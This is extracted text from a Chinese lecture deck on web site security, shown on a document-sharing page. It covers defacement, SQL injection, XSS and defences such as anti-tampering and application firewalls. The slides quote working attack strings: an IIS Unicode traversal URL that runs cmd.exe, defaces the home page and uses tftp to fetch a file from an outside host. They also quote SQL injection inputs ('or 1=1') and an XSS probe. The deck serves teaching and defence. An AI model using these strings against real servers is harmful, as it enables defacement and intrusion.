版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
1、Web网站安全体系架构,提纲,网站工作原理 网站架构 网站与浏览器的交互 Web应用攻击 网页篡改 注入式攻击 跨站攻击 Web应用安全体系架构分析 输入验证 网站备份恢复架构 立体防护体系,3,网站工作原理,Web攻击事件-篡改网页,4,5,Web攻击事件-篡改数据,6,Web攻击事件-跨站攻击,7,Web攻击事件-注入式攻击,8,Web攻击事件-非法上传,常见Web攻击类型,9,产生原因-客观,操作系统的复杂性 已公布超过1万多个系统漏洞 漏洞与补丁 系统漏洞从发现到被利用,平均5天最短0天 系统补丁的平均发布时间为47天 应用漏洞 注入式攻击 多个应用系统不同的开发者 现有技术架构下,网
2、站漏洞长期存在,10,11,产生原因-主观,密码管理 合格密码:8位以上,定期改变 35的人与其他人共享密码 67的人用同一密码访问多个程序 漏洞补丁 定期更新 上网控制 钓鱼、木马、间谍软件,攻击手段示例之一,Unicode漏洞,漏洞选介,Unicode漏洞 微软的IIS在Unicode字符解码的实现中存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令 可以复制、删除、列目录、系统配置等 任何人利用普通浏览器即可发起攻击 存在于Windows NT/2000 (IIS4.0/5.0)中 2001年初发现,2001年8月修复,13,漏洞原理,IIS对特殊字符URL请求的解码错误 %c1%
3、1c - (0 xc1 - 0 xc0) * 0 x40 + 0 x1c = 0 x5c = / %c0%2f - (0 xc0 - 0 xc0) * 0 x40 + 0 x2f = 0 x2f = 构造含有特殊字符的URL请求 绕过IIS的路径检查 可以执行或打开任意文件,14,测试方法,测试URL http:/badou/scripts/.%u00255c./winnt/system32/cmd.exe?/c+dir+d: badou是任意一台(未打补丁的) Windows 2000主机的IIS服务器 返回结果 目标主机D盘下的文件目录,15,利用漏洞列目录,16,17,利用漏洞进行攻击,
4、简单修改主页 在首页内添加文字“导弹袭击” http:/badou/scripts/.%u00255c./winnt/system32/cmd.exe?/c+echo+导弹袭击+c:inetpubwwwrootdefault.htm 上传非法页面 用tftp工具将hack.htm上传到目标主机 http:/badou/scripts/. %u00255c./winnt/ system32/cmd.exe?/c+tftp -i y.y.y.y GET c:inetpubwwwroothack.htm,注入式攻击,19,注入式攻击,全称为“SQL注入式攻击” 攻击者利用网站动态网页程序设计上的漏洞
5、,在目标的Web服务器上运行SQL命令 绕过登录身份检查、获得系统管理员密码、非法获取数据、非法篡改数据、生成非法文件、非法执行命令等,漏洞原理,攻击者在表单输入或者URL请求中发送SQL语句片断,期望通过Web应用脚本合成为带有攻击目的的SQL语句 应用脚本:ASP、JSP、PHP 数据库:一切支持SQL的数据库系统,SQL注入机理分析,SQL注入机理分析(续),/构建SQL 查询语句 = “SELECT name FROM tbUserInfo WHERE id=(用户输入的数据)”,用户名:wc or 1=1 - 密码:xxxx,SELECT name FROM tbUserInfo W
6、HERE id= wc or 1=1 -,SQL注入攻击的一般过程,探测注入点,确定数据库类型和版本,猜解数据库结构,确定当前用户权限,提取信息 篡改数据 ,发起高级攻击,使用特定存储过程,遍历目录结构 ,修改注册码 ,SQL注入攻击的特点,SQL注入是从正常的WWW端口(80端口)访问,表面看起来跟一般的web页面访问没什么区别,SQL注入漏洞是一个入口,攻击者通过它可以发动更高级的攻击,例如控制目标系统。,隐蔽性,后果严重性,25,使用黑客工具,NBSI HDSI Domain X-Scan Pangolin,攻击手段示例之三,跨站攻击,防跨站攻击示例,应用系统未对浏览器输入的参数进行检查
7、和处理,直接返回给用户的浏览器。,B 请输入转账金额:,B 转账成功!,URL:,B 银行破产!,URL:,Xxxs blog: 宣布破产 请点击官方链接,10000,确定,1.正常业务,2.跨站攻击,跨站攻击还能做什么,在客户端执行脚本 JavaScript VBScript 偷取和仿冒用户身份和信息 cookie session 向其他站点提交信息 跳转到其他站点,28,对策,配置和管理 配置网络和主机 编写安全的应用程序 安全扫描 模拟渗透工具 代码复查工具 安全防护 网页完整性检查 应用防火墙,29,对策一,配置和管理,应用程序安全设计原则,权限区域划分 使用最少的特权 应用深入的防御
8、手段 不要信任用户的输入 在网关处进行检查 出现故障时的安全性 保证最脆弱的链接的安全 创建安全的默认值 减小受攻击的范围,31,应用程序安全关注点,“如何安全地处理异常?” “如何保证开发人员工作站的安全性?” “如何编写具有最低权限的代码?” “如何限制文件 I/O?” “如何防止 SQL 注入?” “如何防止跨站点脚本编写?” “如何管理机密?” “如何安全调用非托管代码?” “如何执行托管代码的安全复查?” “如何执行安全的输入验证?” “如何保证窗体身份验证的安全性?”,32,防范注入式攻击,检查用户输入 关键字过滤 强数据类型 服务器端检查 最小权限原则 使用存储过程 使用para
9、meters对象 控制错误信息回显,33,防范跨站攻击,检查用户输入 alert(xss) 检查请求头中的referer,34,对策二,安全扫描,应用安全扫描,测试方法 黑盒测试(渗透和黑客工具) 白盒测试(代码和开发生命周期) 产品 AppScan (IBM) WebInspect (HP) N-Stalker (N-Stalker) Acunetix (Acunetix) MatriXay (亚龙安恒,dbappsecurity) WebRavor (安域领创,SecDomain),36,对策三,安全防护,应用安全防护,网页防篡改系统 保护网页和脚本的完整性 安全容忍类产品 iGuard
10、应用防火墙 防止针对主机和应用程序的威胁 安全防护类产品 华诚 Imperva iWall,38,网页防篡改系统设计思路,网站工作的流程 Web服务器收听请求 解析url 查找url对应的网页文件 对于静态网页文件, 发送给客户端; 对于动态网页文件, 服务器端执行脚本, 生成页面文件发送给客户端.,网页防篡改系统设计思路,网站备份恢复结构设计 网站文件备份 网站文件在处理前先做完整性校验 通过Hook函数修改web服务器(IIS),扩展完整性校验功能 校验不通过,则从备份系统中恢复造篡改的文件 为加速完整性校验,采用数字摘要技术 预先生成原始文件的摘要(数字水印) 实时比对,网页防篡改系统设
11、计思路,网站备份恢复结构处理流程 Web服务器收听请求 解析url 查找url对应的网页文件 读取网页文件后,做完整性校验 校验不通过,则从备份中恢复 对于静态网页文件, 发送给客户端; 对于动态网页文件, 服务器端执行脚本, 生成页面文件发送给客户端.,Web核心内嵌模块,42,硬件平台 (X86/sparc/ItaniumII/PowerPC/PA-RISC),操作系统 (Windows/Linux/FreeBSD/Solaris/AIX/HP-UX),Web服务器软件 (IIS/Apache/Weblogic/Websphere),安全核心内嵌模块,request,response,应用
12、防护技术,数字水印技术,Web服务器,防篡改技术,43,发布服务器,Web服务器,FTP/rsync,一般发布过程,篡改检测模块,自动发布 子系统,监控和恢复 子系统,+,篡改检测 子系统,SSL,1.上传正常网页,=,X,水印库,2.浏览正常网页,3.篡改网页,4.浏览篡改网页,5.自动恢复,文件系统,工作过程,发布过程 发布内嵌模块检测到文件创建/变化 为文件产生加密和不可逆转数字水印 通过加密通道传送到Web服务器 检测过程 公众发出请求浏览网页 应用防护子系统检查请求的合法性 页面保护子系统检查数字水印完整性,其它网页篡改防护的技术路线,外挂轮询 制作网站备份 定期抓取网页与相应的备份
13、网页比对 特点: 可以是后台或前台 无法做到实时恢复,其它网页篡改防护的技术路线,文件保护(事件触发) 改造操作系统文件管理功能,监控和阻断文件写操作 只有特权帐户才能作写操作 Web服务器帐户权限只有读取权限 特点: 权限管理过于严格 限制了web服务器功能,不能适应Web2.0技术的要求,网页防篡改技术比较,Web服务器内置的其它防护功能,同完整性校验功能的实现类似,web服务器在结构上可以扩展其它防护模块 SQL参数的校验处理 用户提交数据中恶意脚本的检查过滤 上述处理功能也可以在防火墙平台上实现 不适用于HTTPS模式,防注入攻击,SELECT * FROM user WHERE na
14、me=hack or 1=1,SELECT * FROM user WHERE name=zhangsan,X,O,Web服务器软件,应用防护模块,输入用户名:,zhangsan,输入用户名:,hack or 1 = 1,or ,1.正常访问,2.注入攻击,防跨站攻击示例,50,B 请输入转账金额:,B 转账成功!,URL:,B 银行破产!,URL:,Xxxs blog: 宣布破产 请点击官方链接,URL:,10000,确定,?,X,1.正常业务,2.跨站攻击,3.应用防护,应用防火墙实现方式比较,51,关键脚本的安全性设计,对于处理用户输入数据的网站脚本文件,考虑安全性设计 Web脚本软件的
15、输入验证:过滤跨站攻击脚本、SQL注入攻击等恶意访问 对于CC攻击类型恶意访问,增加辨识和拒绝功能,两种方案的比较,两种输入验证方案 脚本安全性设计 web服务器内嵌模块 脚本安全性设计,悟道,系统功能与结构的关系 同样的功能需求,包括安全功能需求,可以选择不同的技术路线,采用不同的结构,使用不同的部署模式 复杂的安全功能必然需要一种组合的结构,Web应用安全防护体系,传统网络安全设备,防火墙 限制地址和端口访问 验证和加固网络协议 入侵检测 基于网络层的数据包检查 问题 Web/80端口谁来保护? 应用数据谁来保护? 如何保证公众浏览到的信息是原始的?,Web漏洞,SQL数据库注入漏洞 脚本源代码泄露漏洞 非法执行命令/脚本 缓冲区溢出 恶意编码 跨站脚本漏洞 不安全的本
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 操作系统体系课程设计
- 深度强化学习游戏AIAtari深度实践课程设计
- Snort网络监控课程开发指南课程设计
- 内河航运工程师考试试卷及答案
- 容器逃逸检测应用开发课程设计
- 包装机物料处理设计技术课程设计
- 笔记本支架课程设计
- 美容美体师岗位招聘考试试卷及答案
- 2026年中秋节假期幼儿园中秋美食分享会
- 劳务派遣用工风险防范全攻略
- 2025北京三支一扶真题
- DB33T2339-2021 抹茶茶园绿色生产技术规范
- 协助患者翻身扣背
- 警察心理学课件
- 农作物植保员职业技能竞赛题库及答案
- 汽车使用性能与检测(第三版)全套课件
- 雷雨-剧本原文-高中语文雷雨剧本原文
- 《社区康复》课件-第二章 社区康复的内容
- JCT 929-2023 叶蜡石 (正式版)
- 部编人教版五年级上册语文全册教学课件
- 呼吸机操作考核标准评分表
评论
0/150
提交评论